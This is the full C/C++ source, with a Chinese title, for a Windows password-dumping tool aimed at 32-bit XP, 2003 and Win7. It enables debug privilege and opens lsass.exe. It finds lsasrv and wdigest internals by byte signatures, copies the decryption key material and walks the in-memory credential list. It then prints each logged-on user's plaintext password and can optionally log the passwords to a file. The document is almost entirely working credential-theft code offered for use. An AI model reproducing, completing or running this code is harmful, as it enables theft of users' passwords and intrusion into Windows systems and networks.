用C/C++编写读取Windows登录密码的程序(缺点:只能读取当前电脑上已登录会话的密码;从代码看仅针对32位的 XP/2003/Win7 系列,且依赖特定版本 lsasrv.dll/wdigest.dll 的字节特征码,特征码不匹配时无法工作)

.cpp文件

#include "CrackWinPassword.h"
#pragma warning(disable:4996)
#pragma warning(disable:4703)
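HANDLE GetProcessHandleByName(const CHAR* szName)
{
    // Scan PIDs 4..9996 (PIDs are always multiples of 4), open each process and compare the
    // file-name part of its image path with szName (case-insensitive).
    // Returns an open process handle (the caller closes it) or NULL when nothing matched.
    // The image path comes from NtQueryInformationProcess class 27 (ProcessImageFileName):
    // the buffer receives a UNICODE_STRING header immediately followed by the characters,
    // e.g. "\\Device\\HarddiskVolume1\\Windows\\System32\\smss.exe".
    // NOTE(review): the 8-byte header skip assumes the 32-bit UNICODE_STRING layout, like
    // the rest of this tool; PIDs >= 10000 are never visited.
    WCHAR Buffer[MAX_PATH + 0x20];
    CHAR  szCurrentPath[MAX_PATH];
    DWORD ReturnLength = 0, nBytes = 0;

    HMODULE hNtdll = GetModuleHandle("ntdll.dll");
    pNTQUERYPROCESSINFORMATION NtQueryInformationProcess = NULL;
    if (hNtdll != NULL)
        NtQueryInformationProcess = (pNTQUERYPROCESSINFORMATION)GetProcAddress(hNtdll, "NtQueryInformationProcess");
    if (NtQueryInformationProcess == NULL)
        return NULL;   // previously called through a NULL pointer when the lookup failed

    for (DWORD dwProcessId = 4; dwProcessId < 10 * 1000; dwProcessId += 4)
    {
        // NOTE(review): PROCESS_ALL_ACCESS is more than the callers use (they only need
        // PROCESS_QUERY_INFORMATION | PROCESS_VM_READ); kept unchanged here.
        HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
        if (hProcess == NULL)
            continue;

        // NTSTATUS 0 == success.
        if (NtQueryInformationProcess(hProcess, 27, Buffer, sizeof(Buffer), &ReturnLength) == 0)
        {
            // Skip the UNICODE_STRING header; the path characters follow it.
            PWCHAR pszPath = (PWCHAR)((char*)Buffer + 8);
            nBytes = WideCharToMultiByte(CP_ACP, 0, pszPath, -1, szCurrentPath, MAX_PATH, NULL, NULL);
            if (nBytes)
            {
                // nBytes includes the terminating NUL; walk back to the last backslash.
                PCHAR pCurName = &szCurrentPath[nBytes - 1];
                while (pCurName >= szCurrentPath && *pCurName != '\\')
                    pCurName--;
                pCurName++;
                if (lstrcmpi(szName, pCurName) == 0)
                    return hProcess;
            }
        }
        CloseHandle(hProcess);
    }
    return NULL;
}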
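//
// Locate the head of wdigest's credential list by byte signature (KeyPointerSign).
//
LPVOID GetEncryptListHead()
{
    // Load a private copy of wdigest.dll, find the LAST occurrence of KeyPointerSign between
    // the module base and the SpInstanceInit export, and return the 32-bit value stored
    // 4 bytes before that match (the immediate operand preceding the pattern).
    // NOTE(review): the value is read from the local copy but later used as an address
    // inside lsass.exe — this relies on wdigest.dll mapping at the same base in both.
    // Returns NULL when the DLL/export cannot be resolved or the pattern never matches
    // (previously the no-match case read 4 bytes below the module base).
    HINSTANCE hModWdigest = LoadLibrary("wdigest.dll");
    if (hModWdigest == NULL)
        return NULL;

    LPVOID pEndAddr = (LPVOID)GetProcAddress(hModWdigest, "SpInstanceInit");
    LPVOID KeyPointer = NULL;   // last signature hit so far
    if (pEndAddr != NULL)
    {
        PBYTE pCursor = (PBYTE)hModWdigest;
        for (;;)
        {
            // Resume just past the previous hit so every occurrence is visited in order.
            PBYTE pHit = SearchBytes(pCursor + sizeof(KeyPointerSign),   // start
                                     (PBYTE)pEndAddr,                    // end
                                     KeyPointerSign,                     // pattern
                                     sizeof(KeyPointerSign));            // pattern size
            if (pHit == NULL)
                break;
            KeyPointer = pHit;
            pCursor = pHit;
        }
    }

    // Read the pointer operand before releasing our mapping.
    if (KeyPointer != NULL)
        KeyPointer = (LPVOID)(*(DWORD*)((DWORD)KeyPointer - 4));

    FreeLibrary(hModWdigest);
    return KeyPointer;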
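}

void k8writeTxt(char* logtext)
{
    // Append logtext (NUL-terminated, written as-is, no newline added) to syspass.log in
    // the current directory. Best-effort: failures are silently ignored.
    // NOTE(review): anything passed here lands on disk in clear text, readable by whoever
    // can read the working directory — the data this program handles is highly sensitive,
    // which is presumably why main() keeps the call commented out.
    if (logtext == NULL)
        return;
    FILE* pFile = fopen("syspass.log", "a+");
    if (pFile == NULL)
        return;   // previously: fclose(NULL) when the file could not be opened
    size_t len = strlen(logtext);
    if (len != 0)
        (void)fwrite(logtext, 1, len, pFile);   // short write: nothing further to do
    fclose(pFile);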
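}

int main()
{
    // Overall flow:
    //   1. enable SeDebugPrivilege and open lsass.exe;
    //   2. choose the per-OS offset from a list node's LUID to its credential blob
    //      (XP: 36, 2003: 28, 6.x: 32) from GetVersionEx;
    //   3. find lsasrv's decrypt routine and wdigest's list head by byte signature in
    //      locally loaded copies of those DLLs (they share their base with lsass);
    //   4. mirror lsasrv's key globals into this process (CopyKeyGlobalData);
    //   5. for every logon session, walk the remote list to the node with that LUID,
    //      copy its ciphertext, decrypt locally and print it.
    // Only 32-bit XP/2003/Vista-7 era builds whose signatures match are handled; every
    // other case now exits with a message instead of faulting.
    BYTE EncryptBuf[0x200];   // one remote list node (0x100 bytes are read into it)

    if (FALSE == EnableDebugPrivilege())
    {
        printf("调整进程权限失败.错误代码:%lu\n", GetLastError());
        return 0;
    }

    HANDLE hLsassProcess = GetProcessHandleByName("lsass.exe");
    if (hLsassProcess == NULL)
    {
        printf("通过进程名获取进程句柄失败.错误代码:%lu\n", GetLastError());
        printf("尝试以管理员身份运行.\n");
        return 0;
    }

    // NOTE(review): GetVersionEx reports the manifested compatibility version on newer
    // Windows, so any 6.x result is treated as "WIN7" even where the offsets do not fit.
    OSVERSIONINFO VersionInformation;
    memset(&VersionInformation, 0, sizeof(VersionInformation));
    VersionInformation.dwOSVersionInfoSize = sizeof(VersionInformation);
    if (FALSE == GetVersionEx(&VersionInformation))
    {
        printf("获取操作系统版本失败.错误代码:%lu\n", GetLastError());
        CloseHandle(hLsassProcess);
        return 0;
    }

    DWORD dwVerOff = 0;            // LUID -> LSA_UNICODE_STRING offset inside a list node
    DWORD osKind = (DWORD)-1;
    if (VersionInformation.dwMajorVersion == 5)
    {
        if (VersionInformation.dwMinorVersion == 1)
        {
            dwVerOff = 36;
            osKind = WINXP;
        }
        else if (VersionInformation.dwMinorVersion == 2)
        {
            dwVerOff = 28;
            osKind = WIN03;
        }
    }
    else if (VersionInformation.dwMajorVersion == 6)
    {
        dwVerOff = 32;
        osKind = WIN7;
    }
    if (osKind == (DWORD)-1)
    {
        printf("[未知操作系统版本] 主版本号: %lu 次版本号: %lu\n", VersionInformation.dwMajorVersion, VersionInformation.dwMinorVersion);
        CloseHandle(hLsassProcess);
        return 0;
    }

    HINSTANCE hModLsasrv = LoadLibrary("lsasrv.dll");
    if (hModLsasrv == NULL)
    {
        printf("加载lsasrv.dll模块失败.错误代码:%lu", GetLastError());
        CloseHandle(hLsassProcess);
        return 0;
    }

    // Bound the signature scan by the image size: the old end address 0x7fffdddd ran past
    // the module into whatever was (or was not) mapped above it.
    PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)hModLsasrv + ((PIMAGE_DOS_HEADER)hModLsasrv)->e_lfanew);
    PBYTE pLsasrvEnd = (PBYTE)hModLsasrv + pNtHeaders->OptionalHeader.SizeOfImage;
    pDECRIPTFUNC DecryptFunc = (pDECRIPTFUNC)SearchBytes((PBYTE)hModLsasrv, pLsasrvEnd, DecryptfuncSign, sizeof(DecryptfuncSign));
    LPVOID ListHead = GetEncryptListHead();
    if (DecryptFunc == NULL || ListHead == NULL)
    {
        printf("未找到解密函数或密文链表头的特征码(不支持的系统/DLL版本).\n");
        FreeLibrary(hModLsasrv);
        CloseHandle(hLsassProcess);
        return 0;
    }

    // Copy lsasrv's .data and key material from lsass into our own globals.
    CopyKeyGlobalData(hLsassProcess, hModLsasrv, osKind);

    // Resolve the three secur32 exports used to enumerate/describe logon sessions.
    HINSTANCE hModSecur32 = LoadLibrary("Secur32.dll");
    pLSAENUMERATELOGONSESSIONS LsaEnumerateLogonSessions = NULL;
    pLSAGETLOGONSESSIONDATA    LsaGetLogonSessionData    = NULL;
    pLSAFREERETURNBUFFER       LsaFreeReturnBuffer       = NULL;
    if (hModSecur32 != NULL)
    {
        LsaEnumerateLogonSessions = (pLSAENUMERATELOGONSESSIONS)GetProcAddress(hModSecur32, "LsaEnumerateLogonSessions");
        LsaGetLogonSessionData    = (pLSAGETLOGONSESSIONDATA)GetProcAddress(hModSecur32, "LsaGetLogonSessionData");
        LsaFreeReturnBuffer       = (pLSAFREERETURNBUFFER)GetProcAddress(hModSecur32, "LsaFreeReturnBuffer");
    }
    if (LsaEnumerateLogonSessions == NULL || LsaGetLogonSessionData == NULL || LsaFreeReturnBuffer == NULL)
    {
        printf("加载Secur32.dll导出函数失败.错误代码:%lu\n", GetLastError());
        if (hModSecur32 != NULL)
            FreeLibrary(hModSecur32);
        FreeLibrary(hModLsasrv);
        CloseHandle(hLsassProcess);
        return 0;
    }

    DWORD LogonSessionCount = 0;
    PLUID LogonSessionList = NULL;
    int status = LsaEnumerateLogonSessions(&LogonSessionCount, &LogonSessionList);
    if (status != 0 || LogonSessionList == NULL)
    {
        printf("枚举登录会话失败.状态码:0x%08X\n", (unsigned)status);
        FreeLibrary(hModSecur32);
        FreeLibrary(hModLsasrv);
        CloseHandle(hLsassProcess);
        return 0;
    }

    for (DWORD i = 0; i < LogonSessionCount; i++)
    {
        DWORD dwBytesRead = 0;
        PLUID pCurLUID = &LogonSessionList[i];
        PLUID pListLUID = NULL;
        BOOL  found = FALSE;

        printSessionInfo(LsaGetLogonSessionData, LsaFreeReturnBuffer, pCurLUID);

        // Walk the circular list in lsass: a node's first DWORD is the next-pointer and its
        // LUID sits at node+0x10; stop when the link points back at the head. A failed read
        // ends the walk as "not found" instead of spinning on a stale pointer, and the found
        // flag fixes the old post-loop test, which reported the LAST node as missing.
        if (ReadProcessMemory(hLsassProcess, ListHead, EncryptBuf, 0x100, &dwBytesRead))
        {
            while (*(DWORD*)EncryptBuf != (DWORD)ListHead)
            {
                if (!ReadProcessMemory(hLsassProcess, (LPVOID)(*(DWORD*)EncryptBuf), EncryptBuf, 0x100, &dwBytesRead))
                    break;
                pListLUID = (PLUID)(EncryptBuf + 0x10);
                if (pListLUID->LowPart == pCurLUID->LowPart && pListLUID->HighPart == pCurLUID->HighPart)
                {
                    found = TRUE;
                    break;
                }
            }
        }
        if (!found)
        {
            puts("Specific LUID NOT found\n");
            continue;
        }

        // At LUID + dwVerOff lies an LSA_UNICODE_STRING: +2 MaximumLength, +4 remote Buffer.
        DWORD  pFinal   = (DWORD)pListLUID + dwVerOff;
        DWORD  nBytes   = *(WORD*)(pFinal + 2);
        LPVOID pEncrypt = (LPVOID)(*(DWORD*)(pFinal + 4));

        // The length comes from lsass memory; bound it by the local buffer and keep room
        // for a wide NUL so the %S print below terminates (was an unchecked overflow).
        if (nBytes > sizeof(Encryptdata) - sizeof(WCHAR))
        {
            printf("密文长度异常(%lu 字节), 跳过.\n", nBytes);
            continue;
        }
        memset(Encryptdata, 0, sizeof(Encryptdata));
        if (!ReadProcessMemory(hLsassProcess, pEncrypt, Encryptdata, nBytes, &dwBytesRead) || dwBytesRead != nBytes)
        {
            printf("读取密文失败.错误代码:%lu\n", GetLastError());
            continue;
        }

        // lsasrv's routine decrypts in place using the globals mirrored above.
        DecryptFunc(Encryptdata, nBytes);
        printf("密码: %S\n\n", (const wchar_t*)Encryptdata);
        //k8writeTxt((char*)Encryptdata);   // optional clear-text log (see k8writeTxt note)
    }

    CloseHandle(hLsassProcess);
    LsaFreeReturnBuffer(LogonSessionList);
    FreeLibrary(hModLsasrv);
    FreeLibrary(hModSecur32);
    if (osKind == WIN7)
    {
        // Balance the two LoadLibrary calls CopyKeyGlobalData makes on the WIN7 path.
        FreeLibrary(GetModuleHandle("bcrypt.dll"));
        FreeLibrary(GetModuleHandle("bcryptprimitives.dll"));
    }
    // Wait for the user without spawning cmd.exe (replaces system("echo ... & pause > nul")).
    printf("请按回车键退出...\n");
    (void)getchar();
    return 0;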
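}

void printSessionInfo(pLSAGETLOGONSESSIONDATA LsaGetLogonSessionData, pLSAFREERETURNBUFFER LsaFreeReturnBuffer, PLUID pCurLUID)
{
    // Print the user name and logon domain of one logon session.
    // Both function pointers are the secur32 exports resolved in main(); pCurLUID is one
    // entry of the LsaEnumerateLogonSessions array. A non-zero NTSTATUS (e.g. a session
    // this caller may not query) is reported instead of dereferencing an unset pointer.
    // LSA_UNICODE_STRING.Length is in bytes and Buffer need not be NUL-terminated, so the
    // prints are bounded by Length.
    PSECURITY_LOGON_SESSION_DATA pLogonSessionData = NULL;
    int status = LsaGetLogonSessionData(pCurLUID, &pLogonSessionData);
    if (status != 0 || pLogonSessionData == NULL)
    {
        printf("LsaGetLogonSessionData 失败.状态码:0x%08X\n", (unsigned)status);
        return;
    }

    const LSA_UNICODE_STRING* pUser   = &pLogonSessionData->UserName;
    const LSA_UNICODE_STRING* pDomain = &pLogonSessionData->LogonDomain;
    printf("UserName: %.*S\n", (int)(pUser->Length / sizeof(WCHAR)), pUser->Buffer ? pUser->Buffer : L"");
    printf("LogonDomain: %.*S\n", (int)(pDomain->Length / sizeof(WCHAR)), pDomain->Buffer ? pDomain->Buffer : L"");
    LsaFreeReturnBuffer(pLogonSessionData);
}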
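// Enable SeDebugPrivilege on the current process token.
BOOL EnableDebugPrivilege()
{
    // Returns TRUE only when the privilege is actually enabled. AdjustTokenPrivileges
    // succeeds even when the privilege is not held (GetLastError() then returns
    // ERROR_NOT_ALL_ASSIGNED), which the old code reported as success; the token handle
    // is now closed on every path (it leaked before) and the last error is preserved so
    // the caller can print it. Only the token rights needed for the adjustment are requested.
    HANDLE hToken = NULL;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return FALSE;

    BOOL ok = FALSE;
    LUID sedebugnameValue;
    if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
    {
        TOKEN_PRIVILEGES tkp;
        tkp.PrivilegeCount = 1;
        tkp.Privileges[0].Luid = sedebugnameValue;
        tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        if (AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL))
            ok = (GetLastError() == ERROR_SUCCESS);
    }

    DWORD err = GetLastError();   // keep the failure reason across CloseHandle
    CloseHandle(hToken);
    SetLastError(err);
    return ok;
}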
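//
// Search [pBegin, pEnd) for the nsize-byte sequence at pBytes.
// Returns the address of the first match, or NULL if none (also when the range is
// shorter than nsize or a pointer is NULL). The old version left `count` uninitialised
// when the outer loop never ran — the reason for the disabled C4703 warning.
//
PBYTE SearchBytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize)
{
    if (pBegin == NULL || pEnd == NULL || pBytes == NULL)
        return NULL;

    PBYTE pCur = pBegin;
    // Compare as integers so a candidate that would run past pEnd is never touched.
    while ((ULONG_PTR)pCur + nsize <= (ULONG_PTR)pEnd)
    {
        DWORD count = 0;
        while (count < nsize && pCur[count] == pBytes[count])
            count++;
        if (count == nsize)
            return pCur;
        pCur++;
    }
    return NULL;
}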
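// Mirror the lsasrv globals the decrypt routine depends on into this process.
void CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind)
{
    // Steps:
    //  1. copy lsass's live copy of lsasrv's second section (presumably .data — the
    //     section index is hard-coded, verify against the targeted build) over our own
    //     mapping of lsasrv.dll at the same address (the DLL shares its base with lsass);
    //  2. find the key-material pointer with the per-OS byte signature, copy the remote
    //     structures it refers to into MemBuf/SecBuf/ThirdBuf, and repoint the local
    //     copies at those buffers so DecryptFunc dereferences local memory.
    // On a missing signature or a failed read the function prints a message and returns,
    // leaving the globals partially initialised (previously a missing signature
    // dereferenced NULL +/- 4). The section copy is only warned about, as before.
    PIMAGE_DOS_HEADER pDosHead = (PIMAGE_DOS_HEADER)hModlsasrv;
    PIMAGE_NT_HEADERS pPEHead  = (PIMAGE_NT_HEADERS)(pDosHead->e_lfanew + (DWORD)hModlsasrv);
    // Second IMAGE_SECTION_HEADER: first header sits right after the NT headers.
    PIMAGE_SECTION_HEADER pSectionHead = (PIMAGE_SECTION_HEADER)(pDosHead->e_lfanew + (DWORD)hModlsasrv
                                                                 + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER));
    LPVOID pdataAddr = (LPVOID)((DWORD)pSectionHead->VirtualAddress + (DWORD)hModlsasrv);
    // VirtualSize rounded up to whole 4K pages (always one page more than strictly needed).
    DWORD  dwBytes = ((DWORD)(pSectionHead->Misc.VirtualSize) / 0x1000 + 1) * 0x1000;
    DWORD  dwBytesRead = 0;

    // Source and destination are the same address: the remote pages land on top of our
    // private copy-on-write mapping of the section.
    if (!ReadProcessMemory(hProcess, pdataAddr, pdataAddr, dwBytes, &dwBytesRead))
        printf("警告: 读取 lsasrv 数据节不完整(%lu 字节).错误代码:%lu\n", dwBytesRead, GetLastError());

    LPVOID pEndAddr    = (LPVOID)(pPEHead->OptionalHeader.SizeOfImage + (DWORD)hModlsasrv);
    LPVOID pDecryptKey = NULL;
    LPVOID DecryptKey  = NULL;

    switch (osKind)
    {
    case WINXP:
    case WIN03:
    {
        pDecryptKey = (LPVOID)SearchBytes((PBYTE)hModlsasrv, (PBYTE)pEndAddr, DecryptKeySign_XP, sizeof(DecryptKeySign_XP));
        if (pDecryptKey == NULL)
        {
            printf("未找到 XP/2003 解密密钥特征码.\n");
            return;
        }
        // The key pointer is the DWORD immediately after the signature.
        pDecryptKey = (LPVOID)*(DWORD*)((DWORD)pDecryptKey + sizeof(DecryptKeySign_XP));
        if (!ReadProcessMemory(hProcess, pDecryptKey, &DecryptKey, 4, &dwBytesRead) ||
            !ReadProcessMemory(hProcess, DecryptKey, MemBuf, 0x200, &dwBytesRead))
        {
            printf("读取解密密钥数据失败.错误代码:%lu\n", GetLastError());
            return;
        }
        *(DWORD*)pDecryptKey = (DWORD)MemBuf;   // local copy now points at our buffer
        break;
    }
    case WIN7:
    {
        // The Win7 decrypt path calls into these two DLLs; main() frees them again.
        LoadLibrary("bcrypt.dll");
        LoadLibrary("bcryptprimitives.dll");
        pDecryptKey = (LPVOID)SearchBytes((PBYTE)hModlsasrv, (PBYTE)pEndAddr, DecryptKeySign_WIN7, sizeof(DecryptKeySign_WIN7));
        if (pDecryptKey == NULL)
        {
            printf("未找到 Win7 解密密钥特征码.\n");
            return;
        }
        // Here the key pointer is the DWORD immediately BEFORE the signature.
        pDecryptKey = (LPVOID)(*(DWORD*)((DWORD)pDecryptKey - 4));
        if (!ReadProcessMemory(hProcess, pDecryptKey, &DecryptKey, 0x4, &dwBytesRead) ||
            !ReadProcessMemory(hProcess, DecryptKey, MemBuf, 0x200, &dwBytesRead))
        {
            printf("读取解密密钥数据失败.错误代码:%lu\n", GetLastError());
            return;
        }
        *(DWORD*)pDecryptKey = (DWORD)MemBuf;

        // MemBuf+8 and MemBuf+0xC hold two further remote pointers; copy their targets
        // and repoint them in the same way.
        if (!ReadProcessMemory(hProcess, (LPVOID)(*(DWORD*)(MemBuf + 8)), SecBuf, 0x200, &dwBytesRead))
        {
            printf("读取第二级密钥数据失败.错误代码:%lu\n", GetLastError());
            return;
        }
        *(DWORD*)(MemBuf + 8) = (DWORD)SecBuf;
        if (!ReadProcessMemory(hProcess, (LPVOID)(*(DWORD*)(MemBuf + 0xC)), ThirdBuf, 0x200, &dwBytesRead))
        {
            printf("读取第三级密钥数据失败.错误代码:%lu\n", GetLastError());
            return;
        }
        *(DWORD*)(MemBuf + 0xC) = (DWORD)ThirdBuf;
        break;
    }
    default:
        printf("不支持的系统类型: %d\n", osKind);
        break;
    }
}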

CrackWinPassword.h 头文件(上面的 .cpp 文件通过 #include "CrackWinPassword.h" 引用,全局缓冲区和特征码都定义在这里)

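#pragma once
#include <windows.h>
#include <stdio.h>

// Size of MemBuf (CopyKeyGlobalData fills only the first 0x200 bytes).
#define MEM_SIZE 0x1000

// osKind values chosen from GetVersionEx in main(); compared for equality only.
#define WIN7     0x1
#define WINXP    0x2
#define WIN03    0x4

// Local mirrors of the ntsecapi.h types (that header is not included here).
// NOTE(review): these definitions clash with ntsecapi.h if it is ever included in the
// same translation unit.
typedef struct _LSA_UNICODE_STRING
{
    USHORT Length;          // in bytes; Buffer is not guaranteed to be NUL-terminated
    USHORT MaximumLength;
    PWSTR  Buffer;
} LSA_UNICODE_STRING, *PLSA_UNICODE_STRING;

typedef struct _SECURITY_LOGON_SESSION_DATA
{
    ULONG              Size;
    LUID               LogonId;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING LogonDomain;
    LSA_UNICODE_STRING AuthenticationPackage;
    ULONG              LogonType;
    ULONG              Session;
    PSID               Sid;
    LARGE_INTEGER      LogonTime;
    LSA_UNICODE_STRING LogonServer;
    LSA_UNICODE_STRING DnsDomainName;
    LSA_UNICODE_STRING Upn;
} SECURITY_LOGON_SESSION_DATA, *PSECURITY_LOGON_SESSION_DATA;

// Function-pointer types for exports resolved at runtime with GetProcAddress.
typedef int(__stdcall* pNTQUERYPROCESSINFORMATION)(HANDLE, DWORD, PVOID, ULONG, PULONG);   // ntdll!NtQueryInformationProcess
typedef int(__stdcall* pLSAENUMERATELOGONSESSIONS)(PULONG, PLUID*);                         // secur32!LsaEnumerateLogonSessions
typedef int(__stdcall* pDECRIPTFUNC)(PBYTE, DWORD);                                         // lsasrv in-place decrypt routine (found by signature)
typedef int(__stdcall* pLSAFREERETURNBUFFER)(PVOID);                                        // secur32!LsaFreeReturnBuffer
typedef int(__stdcall* pLSAGETLOGONSESSIONDATA)(PLUID, PSECURITY_LOGON_SESSION_DATA*);      // secur32!LsaGetLogonSessionData

BOOL   EnableDebugPrivilege();
void   printHexBytes(PBYTE data, int nBytes);   // declared but not defined in this listing
PBYTE  SearchBytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize);
void   CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind);
HANDLE GetProcessHandleByName(const CHAR* szName);
LPVOID GetEncryptListHead();
void   printSessionInfo(pLSAGETLOGONSESSIONDATA, pLSAFREERETURNBUFFER, PLUID);

// x86 code-byte signatures. They are build-specific: on a DLL version where they do not
// match, SearchBytes returns NULL and the callers bail out.

// Decrypt routine (lsasrv .text).
BYTE DecryptfuncSign[] =
{
    0x8B, 0xFF, 0x55, 0x8B,
    0xEC, 0x6A, 0x00, 0xFF,
    0x75, 0x0C, 0xFF, 0x75,
    0x08, 0xE8
};

// Key-material pointer (lsasrv .text); Win7 reads the DWORD before the match, XP/2003 after it.
BYTE DecryptKeySign_WIN7[] =
{
    0x33, 0xD2, 0xC7, 0x45,
    0xE8, 0x08, 0x00, 0x00,
    0x00, 0x89, 0x55, 0xE4
};

BYTE DecryptKeySign_XP[] =
{
    0x8D, 0x85, 0xF0, 0xFE,
    0xFF, 0xFF, 0x50, 0xFF,
    0x75, 0x10, 0xFF, 0x35
};

// Credential list head pointer (wdigest .text); the DWORD before the last match is used.
BYTE KeyPointerSign[] =
{
    0x8B, 0x45, 0x08, 0x89,
    0x08, 0xC7, 0x40, 0x04
};

// Global scratch buffers.
// NOTE(review): these are definitions (not extern declarations) living in a header — fine
// for this single-translation-unit program, duplicate symbols if a second .c includes it.
BYTE MemBuf[MEM_SIZE], SecBuf[0x200], ThirdBuf[0x200];
BYTE Encryptdata[0x100];   // ciphertext/plaintext scratch; main() must bound reads by this size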
